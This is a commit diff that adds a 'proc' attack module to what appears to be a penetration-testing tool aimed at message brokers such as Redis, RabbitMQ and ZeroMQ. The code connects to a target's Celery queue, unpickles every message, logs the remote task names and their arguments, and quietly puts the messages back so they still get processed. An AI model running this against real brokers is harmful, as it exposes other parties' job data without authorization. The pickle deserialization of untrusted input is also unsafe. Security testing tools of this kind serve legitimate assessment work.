add: new attack family - proc

add: new attack for redis- discover-dbs

enteletaor_lib/modules/proc/__init__.py

@@ -0,0 +1,57 @@
+# -*- coding: utf-8 -*-
+
+import logging
+
+from modules import IModule
+
+from libs.core.structs import CommonData
+from libs.core.models import IntegerField, StringField, SelectField
+
+from .proc_raw_dump import action_proc_raw_dump
+from .cmd_actions import parser_proc_raw_dump
+
+log = logging.getLogger()
+
+
+# ----------------------------------------------------------------------
+class ModuleModel(CommonData):
+	target = StringField(required=True)
+	export_results = StringField(default="")
+	import_results = StringField(default=None)
+	db = StringField(default=None, label="only for Redis: database to use")
+	broker_type = SelectField(default="redis", choices=[
+		("redis", "Redis server"),
+		("zmq", "ZeroMQ"),
+		("amqp", "RabbitMQ broker")
+	])
+
+
+# ----------------------------------------------------------------------
+class RemoteProcessModule(IModule):
+	"""
+	Try to extract information from remote processes
+	"""
+	__model__ = ModuleModel
+	__submodules__ = {
+		'raw-dump': dict(
+			help="dump raw remote information process",
+			cmd_args=parser_proc_raw_dump,
+			action=action_proc_raw_dump
+		),
+	}
+
+	name = "proc"
+	description = "try to discover and handle processes in remote MQ/Brokers"
+
+	# ----------------------------------------------------------------------
+	def run(self, config):
+		# --------------------------------------------------------------------------
+		# Ver dirty monkey patch to avoid kombu write into screen
+		# --------------------------------------------------------------------------
+		try:
+			import sys
+			sys.stderr = open("/dev/null")
+		except IOError:
+			pass
+
+		super(RemoteProcessModule, self).run(config)

enteletaor_lib/modules/proc/cmd_actions.py

@@ -0,0 +1,13 @@
+# -*- coding: utf-8 -*-
+
+"""
+This file contains command line actions for argparser
+"""
+
+
+# ----------------------------------------------------------------------
+def parser_proc_raw_dump(parser):
+	parser.add_argument("--tail", action="store_true", dest="tail_mode", default=False,
+	                    help="although all information be dumped do not stop")
+	parser.add_argument("-I", dest="interval", type=float, default=4,
+	                    help="timeout interval between tow connections")

enteletaor_lib/modules/proc/proc_raw_dump.py

@@ -0,0 +1,75 @@
+# -*- coding: utf-8 -*-
+
+import six
+import logging
+
+from time import sleep
+from kombu import Connection
+from kombu.simple import Empty
+from six.moves.cPickle import loads
+from kombu.exceptions import SerializationError
+
+log = logging.getLogger()
+
+
+# ----------------------------------------------------------------------
+def action_proc_raw_dump(config):
+
+	url = '%s://%s' % (config.broker_type, config.target)
+
+	# with Connection('redis://%s' % REDIS) as conn:
+	with Connection(url) as conn:
+		in_queue = conn.SimpleQueue('celery')
+
+		to_inject = []
+		already_processed = set()
+
+		while 1:
+			try:
+				while 1:
+					message = in_queue.get(block=False, timeout=1)
+
+					# --------------------------------------------------------------------------
+					# Try to deserialize
+					# --------------------------------------------------------------------------
+					# Is Pickle info?
+					try:
+						deserialized = loads(message.body)
+					except SerializationError:
+						pass
+
+					msg_id = deserialized['id']
+
+					# Read info
+					if msg_id not in already_processed:
+
+						remote_process = deserialized['task'].split(".")[-1]
+						remote_args = deserialized['args']
+
+						# Show info
+						log.error("Found process information:")
+						log.error("  -  Remote process name: '%s'" % remote_process)
+						log.error("  -  Input parameters:")
+						for i, x in enumerate(remote_args):
+							log.error("      -> P%s: %s" % (i, x))
+
+						# Store as processed
+						already_processed.add(msg_id)
+
+					# --------------------------------------------------------------------------
+					# Store message to re-send
+					# --------------------------------------------------------------------------
+					to_inject.append(deserialized)
+
+			except Empty:
+				# When Queue is Empty -> reinject all removed messages
+				for x in to_inject:
+					in_queue.put(x, serializer="pickle")
+
+				# Queue is empty -> wait
+				if config.tail_mode:
+					log.error("No more messages from server. Waiting for %s seconds and try again.." % config.interval)
+					sleep(config.interval)
+				else:
+					log.error("No more messages from server. Exiting...")
+					return